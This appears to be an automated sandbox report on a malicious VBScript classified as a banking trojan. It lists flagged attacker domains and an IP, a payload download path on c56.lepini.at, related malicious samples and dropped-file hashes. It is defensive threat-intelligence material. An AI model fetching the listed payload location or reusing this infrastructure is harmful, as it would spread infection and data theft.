http://search.yahoo.co.jp/favicon.ico	0%	URL Reputation	safe
http://search.yahoo.co.jp/favicon.ico	0%	URL Reputation	safe
http://search.yahoo.co.jp/favicon.ico	0%	URL Reputation	safe
http://www.gmarket.co.kr/	0%	URL Reputation	safe
http://www.gmarket.co.kr/	0%	URL Reputation	safe
http://www.gmarket.co.kr/	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://searchresults.news.com.au/	0%	URL Reputation	safe
http://searchresults.news.com.au/	0%	URL Reputation	safe
http://searchresults.news.com.au/	0%	URL Reputation	safe
http://www.asharqalawsat.com/	0%	URL Reputation	safe
http://www.asharqalawsat.com/	0%	URL Reputation	safe
http://www.asharqalawsat.com/	0%	URL Reputation	safe
http://search.yahoo.co.jp	0%	URL Reputation	safe
http://search.yahoo.co.jp	0%	URL Reputation	safe
http://search.yahoo.co.jp	0%	URL Reputation	safe
http://buscador.terra.es/	0%	URL Reputation	safe
http://buscador.terra.es/	0%	URL Reputation	safe
http://buscador.terra.es/	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
c56.lepini.at	47.241.19.44	true	true	12%, Virustotal, Browse	unknown
resolver1.opendns.com	208.67.222.222	true	false		high
api3.lepini.at	47.241.19.44	true	false	11%, Virustotal, Browse	unknown
api10.laptok.at	47.241.19.44	true	false	12%, Virustotal, Browse	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://search.chol.com/favicon.ico	explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	false		high
http://www.mercadolivre.com.br/	explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.merlin.com.pl/favicon.ico	explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.ebay.de/	explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	false		high
http://www.mtv.com/	explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	false		high
http://www.rambler.ru/	explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	false		high
http://www.nifty.com/favicon.ico	explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	false		high
http://www.dailymail.co.uk/	explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www3.fnac.com/favicon.ico	explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	false		high
http://buscar.ya.com/	explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	false		high
http://search.yahoo.com/favicon.ico	explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	false		high
http://constitution.org/usdeclar.txtC:	powershell.exe, 00000018.00000003.351645434.00000221A3020000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://https://file://USER.ID%lu.exe/upd	powershell.exe, 00000018.00000003.351645434.00000221A3020000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	low
http://www.sogou.com/favicon.ico	explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com/designers	explorer.exe, 00000023.00000000.388592956.0000000008B46000.00000002.00000001.sdmp	false		high
http://asp.usatoday.com/	explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	false		high
http://fr.search.yahoo.com/	explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	false		high
http://rover.ebay.com	explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	false		high
http://in.search.yahoo.com/	explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	false		high
http://img.shopzilla.com/shopzilla/shopzilla.ico	explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	false		high
http://schemas.microsRD8Et	explorer.exe, 00000023.00000003.559813956.00000000089AA000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://search.ebay.in/	explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	false		high
http://image.excite.co.jp/jp/favicon/lep.ico	explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000018.00000002.430783857.000002219A643000.00000004.00000001.sdmp	false		high
http://www.galapagosdesign.com/DPlease	explorer.exe, 00000023.00000000.388592956.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://%s.com	explorer.exe, 00000023.00000000.378969278.0000000006300000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
http://msk.afisha.ru/	explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	false		high
http://www.zhongyicts.com.cn	explorer.exe, 00000023.00000000.388592956.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000018.00000002.410155659.000002218A5E1000.00000004.00000001.sdmp	false		high
http://busca.igbusca.com.br//app/static/images/favicon.ico	explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.rediff.com/	explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	false		high
http://www.ya.com/favicon.ico	explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	false		high
http://www.etmall.com.tw/favicon.ico	explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://it.search.dada.net/favicon.ico	explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000018.00000002.410423008.000002218A7EE000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.naver.com/	explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	false		high
http://www.google.ru/	explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	false		high
http://search.hanafos.com/favicon.ico	explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000018.00000002.410423008.000002218A7EE000.00000004.00000001.sdmp	false		high
http://cgi.search.biglobe.ne.jp/favicon.ico	explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.abril.com.br/favicon.ico	explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.daum.net/	explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 00000018.00000002.430783857.000002219A643000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://search.naver.com/favicon.ico	explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	false		high
http://search.msn.co.jp/results.aspx?q=	explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.clarin.com/favicon.ico	explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	false		high
http://buscar.ozu.es/	explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://kr.search.yahoo.com/	explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	false		high
http://search.about.com/	explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	false		high
http://busca.igbusca.com.br/	explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity	explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	false		high
http://www.ask.com/	explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	false		high
http://www.priceminister.com/favicon.ico	explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 00000018.00000002.410423008.000002218A7EE000.00000004.00000001.sdmp	false		high
http://www.cjmall.com/	explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	false		high
http://search.centrum.cz/	explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	false		high
http://www.carterandcone.coml	explorer.exe, 00000023.00000000.388592956.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://suche.t-online.de/	explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	false		high
http://www.google.it/	explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	false		high
http://search.auction.co.kr/	explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.ceneo.pl/	explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	false		high
http://www.amazon.de/	explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	false		high
http://sads.myspace.com/	explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	false		high
http://busca.buscape.com.br/favicon.ico	explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.pchome.com.tw/favicon.ico	explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://browse.guardian.co.uk/favicon.ico	explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://google.pchome.com.tw/	explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://list.taobao.com/browse/search_visual.htm?n=15&q=	explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	false		high
http://www.rambler.ru/favicon.ico	explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	false		high
http://uk.search.yahoo.com/	explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	false		high
http://espanol.search.yahoo.com/	explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	false		high
http://www.ozu.es/favicon.ico	explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://search.sify.com/	explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	false		high
http://openimage.interpark.com/interpark.ico	explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	false		high
http://search.yahoo.co.jp/favicon.ico	explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.ebay.com/	explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	false		high
http://www.gmarket.co.kr/	explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.founder.com.cn/cn/bThe	explorer.exe, 00000023.00000000.388592956.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.nifty.com/	explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	false		high
http://searchresults.news.com.au/	explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.google.si/	explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	false		high
http://www.google.cz/	explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	false		high
http://www.soso.com/	explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	false		high
http://www.univision.com/	explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	false		high
http://search.ebay.it/	explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	false		high
http://images.joins.com/ui_c/fvc_joins.ico	explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	false		high
http://www.asharqalawsat.com/	explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://busca.orange.es/	explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	false		high
http://cnweb.search.live.com/results.aspx?q=	explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	false		high
http://auto.search.msn.com/response.asp?MT=	explorer.exe, 00000023.00000000.378969278.0000000006300000.00000002.00000001.sdmp	false		high
http://search.yahoo.co.jp	explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.target.com/	explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	false		high
http://buscador.terra.es/	explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.typography.netD	explorer.exe, 00000023.00000000.388592956.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://fontfabrik.com	explorer.exe, 00000023.00000000.388592956.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.orange.co.uk/favicon.ico	explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.iask.com/	explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.tesco.com/	explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	false		high
http://cgi.search.biglobe.ne.jp/	explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://search.seznam.cz/favicon.ico	explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
47.241.19.44	unknown	United States		45102	CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC	true

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	31.0.0 Red Diamond
Analysis ID:	321727
Start date:	23.11.2020
Start time:	16:10:27
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 9m 11s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	JeSoTz0An7tn.vbs
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	38
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.bank.troj.spyw.evad.winVBS@26/41@10/2
EGA Information:	Failed
HDC Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 2 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .vbs
Warnings:	Show All Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information. Exclude process from analysis (whitelisted): taskhostw.exe, audiodg.exe, rundll32.exe, BackgroundTransferHost.exe, ielowutil.exe, backgroundTaskHost.exe, SgrmBroker.exe, WmiPrvSE.exe, svchost.exe, UsoClient.exe Excluded IPs from analysis (whitelisted): 104.42.151.234, 104.43.193.48, 51.11.168.160, 95.101.184.67, 104.108.39.131, 20.54.26.129, 152.199.19.161, 104.43.139.144, 51.104.139.180, 92.122.213.247, 92.122.213.194, 52.155.217.156 Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e11290.dspg.akamaiedge.net, iecvlist.microsoft.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, go.microsoft.com, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, fs.microsoft.com, ie9comview.vo.msecnd.net, db3p-ris-pf-prod-atm.trafficmanager.net, ris-prod.trafficmanager.net, displaycatalog.md.mp.microsoft.com.akadns.net, e1723.g.akamaiedge.net, skypedataprdcolcus16.cloudapp.net, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, blobcollector.events.data.trafficmanager.net, go.microsoft.com.edgekey.net, skypedataprdcolwus16.cloudapp.net, cs9.wpc.v0cdn.net Execution Graph export aborted for target mshta.exe, PID 6608 because there are no executed function Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtEnumerateKey calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
16:11:31	API Interceptor	1x Sleep call for process: wscript.exe modified
16:12:08	API Interceptor	30x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
47.241.19.44	2Q4tLHa5wbO1.vbs	Get hash	malicious	Browse	c56.lepini.at/jvassets/xI/t64.dat
	0wDeH3QW0mRu.vbs	Get hash	malicious	Browse	c56.lepini.at/jvassets/xI/t64.dat
	0k4Vu1eOEIhU.vbs	Get hash	malicious	Browse	c56.lepini.at/jvassets/xI/t64.dat
	earmarkavchd.dll	Get hash	malicious	Browse	c56.lepini.at/jvassets/xI/t64.dat
	6znkPyTAVN7V.vbs	Get hash	malicious	Browse	c56.lepini.at/jvassets/xI/t64.dat
	a7APrVP2o2vA.vbs	Get hash	malicious	Browse	c56.lepini.at/jvassets/xI/t64.dat
	03QKtPTOQpA1.vbs	Get hash	malicious	Browse	c56.lepini.at/jvassets/xI/t64.dat
	2200.dll	Get hash	malicious	Browse	c56.lepini.at/jvassets/xI/t64.dat
	22.dll	Get hash	malicious	Browse	api10.laptok.at/favicon.ico
	mRT14x9OHyME.vbs	Get hash	malicious	Browse	api10.laptok.at/favicon.ico
	0RLNavifGxAL.vbs	Get hash	malicious	Browse	c56.lepini.at/jvassets/xI/t64.dat
	1ImYNi1n8qsm.vbs	Get hash	malicious	Browse	c56.lepini.at/jvassets/xI/t64.dat
	4N9Gt68V5bB5.vbs	Get hash	malicious	Browse	api10.laptok.at/favicon.ico
	34UO9lvsKWLW.vbs	Get hash	malicious	Browse	api10.laptok.at/favicon.ico
	csye1F5W042k.vbs	Get hash	malicious	Browse	api10.laptok.at/favicon.ico
	0cJWsqWE2WRJ.vbs	Get hash	malicious	Browse	api10.laptok.at/favicon.ico
	08dVB7v4wB6w.vbs	Get hash	malicious	Browse	api10.laptok.at/favicon.ico
	9EJxhyQLyzPG.vbs	Get hash	malicious	Browse	api10.laptok.at/favicon.ico
	http://c56.lepini.at	Get hash	malicious	Browse	c56.lepini.at/
	my_presentation_82772.vbs	Get hash	malicious	Browse	api10.laptok.at/favicon.ico

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
resolver1.opendns.com	2Q4tLHa5wbO1.vbs	Get hash	malicious	Browse	208.67.222.222
	0wDeH3QW0mRu.vbs	Get hash	malicious	Browse	208.67.222.222
	0k4Vu1eOEIhU.vbs	Get hash	malicious	Browse	208.67.222.222
	earmarkavchd.dll	Get hash	malicious	Browse	208.67.222.222
	6znkPyTAVN7V.vbs	Get hash	malicious	Browse	208.67.222.222
	a7APrVP2o2vA.vbs	Get hash	malicious	Browse	208.67.222.222
	03QKtPTOQpA1.vbs	Get hash	malicious	Browse	208.67.222.222
	fY9ZC2mGfd.exe	Get hash	malicious	Browse	208.67.222.222
	H58f3VmSsk.exe	Get hash	malicious	Browse	208.67.222.222
	2200.dll	Get hash	malicious	Browse	208.67.222.222
	5faabcaa2fca6rar.dll	Get hash	malicious	Browse	208.67.222.222
	0RLNavifGxAL.vbs	Get hash	malicious	Browse	208.67.222.222
	1ImYNi1n8qsm.vbs	Get hash	malicious	Browse	208.67.222.222
	YjimyNp5ma.exe	Get hash	malicious	Browse	208.67.222.222
	0cJWsqWE2WRJ.vbs	Get hash	malicious	Browse	208.67.222.222
	08dVB7v4wB6w.vbs	Get hash	malicious	Browse	208.67.222.222
	9EJxhyQLyzPG.vbs	Get hash	malicious	Browse	208.67.222.222
	u271020tar.dll	Get hash	malicious	Browse	208.67.222.222
	Ne3oNxfdDc.dll	Get hash	malicious	Browse	208.67.222.222
	5f7c48b110f15tiff_.dll	Get hash	malicious	Browse	208.67.222.222
c56.lepini.at	2Q4tLHa5wbO1.vbs	Get hash	malicious	Browse	47.241.19.44
	0wDeH3QW0mRu.vbs	Get hash	malicious	Browse	47.241.19.44
	0k4Vu1eOEIhU.vbs	Get hash	malicious	Browse	47.241.19.44
	earmarkavchd.dll	Get hash	malicious	Browse	47.241.19.44
	6znkPyTAVN7V.vbs	Get hash	malicious	Browse	47.241.19.44
	a7APrVP2o2vA.vbs	Get hash	malicious	Browse	47.241.19.44
	03QKtPTOQpA1.vbs	Get hash	malicious	Browse	47.241.19.44
	2200.dll	Get hash	malicious	Browse	47.241.19.44
	0RLNavifGxAL.vbs	Get hash	malicious	Browse	47.241.19.44
	1ImYNi1n8qsm.vbs	Get hash	malicious	Browse	47.241.19.44
	http://c56.lepini.at	Get hash	malicious	Browse	47.241.19.44
api3.lepini.at	2Q4tLHa5wbO1.vbs	Get hash	malicious	Browse	47.241.19.44
	0wDeH3QW0mRu.vbs	Get hash	malicious	Browse	47.241.19.44
	0k4Vu1eOEIhU.vbs	Get hash	malicious	Browse	47.241.19.44
	earmarkavchd.dll	Get hash	malicious	Browse	47.241.19.44
	6znkPyTAVN7V.vbs	Get hash	malicious	Browse	47.241.19.44
	a7APrVP2o2vA.vbs	Get hash	malicious	Browse	47.241.19.44
	03QKtPTOQpA1.vbs	Get hash	malicious	Browse	47.241.19.44
	2200.dll	Get hash	malicious	Browse	47.241.19.44
	0RLNavifGxAL.vbs	Get hash	malicious	Browse	47.241.19.44
	1ImYNi1n8qsm.vbs	Get hash	malicious	Browse	47.241.19.44
	0cJWsqWE2WRJ.vbs	Get hash	malicious	Browse	47.241.19.44
	08dVB7v4wB6w.vbs	Get hash	malicious	Browse	47.241.19.44
	9EJxhyQLyzPG.vbs	Get hash	malicious	Browse	47.241.19.44
	C4iOuBBkd5lq-beware-malware.vbs	Get hash	malicious	Browse	8.208.101.13
	PtgzM1Gd04Up.vbs	Get hash	malicious	Browse	8.208.101.13

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC	https://bit.ly/3lYk4Bx	Get hash	malicious	Browse	8.208.98.199
	2Q4tLHa5wbO1.vbs	Get hash	malicious	Browse	47.241.19.44
	https://bouncy-alpine-yam.glitch.me/#j.dutheil@dagimport.com	Get hash	malicious	Browse	47.254.218.25
	0wDeH3QW0mRu.vbs	Get hash	malicious	Browse	47.241.19.44
	0k4Vu1eOEIhU.vbs	Get hash	malicious	Browse	47.241.19.44
	https://bit.ly/35MTO80	Get hash	malicious	Browse	8.208.98.199
	videorepair_setup_full6715.exe	Get hash	malicious	Browse	47.91.67.36
	http://banchio.com/common/imgbrowser/update/index.php	Get hash	malicious	Browse	47.241.0.4
	earmarkavchd.dll	Get hash	malicious	Browse	47.241.19.44
	6znkPyTAVN7V.vbs	Get hash	malicious	Browse	47.241.19.44
	a7APrVP2o2vA.vbs	Get hash	malicious	Browse	47.241.19.44
	03QKtPTOQpA1.vbs	Get hash	malicious	Browse	47.241.19.44
	1119_673423.doc	Get hash	malicious	Browse	8.208.13.158
	1118_8732615.doc	Get hash	malicious	Browse	8.208.13.158
	https://bit.ly/36uHc4k	Get hash	malicious	Browse	8.208.98.199
	https://bit.ly/2UkQfiI	Get hash	malicious	Browse	8.208.98.199
	WeTransfer File for info@nanniottavio.it .html	Get hash	malicious	Browse	47.254.218.25
	https://bit.ly/2K1UcH2	Get hash	malicious	Browse	8.208.98.199
	http://sistaqui.com/wp-content/activatedg.php?utm_source=google&utm_medium=adwords&utm_campaign=dvid	Get hash	malicious	Browse	47.254.170.17
	https://bit.ly/32NFFFf	Get hash	malicious	Browse	8.208.98.199

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{A2AB1976-2DE9-11EB-90E4-ECF4BB862DED}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	71272
Entropy (8bit):	2.0413134209733683
Encrypted:	false
SSDEEP:	192:rwZ3Zt2Y9WJ4tJbfJgFMm/2dStdxsdVtdQqsdvVIXGsIXtINZ3Q6lxrIJTtGhxmq:rgJEYUWNXTAIVyDMSaZg6lV6TtGhxmTe
MD5:	1C6AF18081A0D930D98C561342D1A2AB
SHA1:	C7E0EA65F45479A3CD1F083B12EBBE81121D7570
SHA-256:	30196A4745ECF3A4D4A9200D4A3D960DF87277B4AFAC34C2EA5623F0AA5D65A2
SHA-512:	3BF525105C85FFC5327F5AA96B229E37527DB1A37C84E3E53DB8A183D67E699128E92419434BEF313E225DCB2FCFB8F31051E3AD1B33BCF6972DA9D137B759EC
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{A2AB1978-2DE9-11EB-90E4-ECF4BB862DED}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	28168
Entropy (8bit):	1.9254021779707862
Encrypted:	false
SSDEEP:	192:rbZAQK6QkeFjt2AkWvM2YBwjId0LpGlwj9jId0LpnyA:rtZ1dehkEk2IR0LEn0L9F
MD5:	7435B2595868CAF364F9CD83914629B6
SHA1:	62BCD06633B51360CC901DB2112338564987365A
SHA-256:	40DC1F2BBEF7CF147DDD64E3725221E1056711F48A816323C2C4B1E7DE8FA4FE
SHA-512:	81623B8EA6651BFC9464EE3595A7F4C7521F72AEE4BD84A7655F45A469F5B90725B1207A023887979A7412511AE17AB4B7393EF62B3783451945E0A4F4CAB214
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{A2AB197A-2DE9-11EB-90E4-ECF4BB862DED}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	28172
Entropy (8bit):	1.9305732094629535
Encrypted:	false
SSDEEP:	192:rXZkQI63kHFjh2LkWiMRYtzseQcpVlzqseQcbuA:rJtT0HhQvTRkzhvzqjJ
MD5:	69CCA023383DCEBD768E209D96C760C8
SHA1:	98895FC46196F5356BC1083EC41ABF2C20578F18
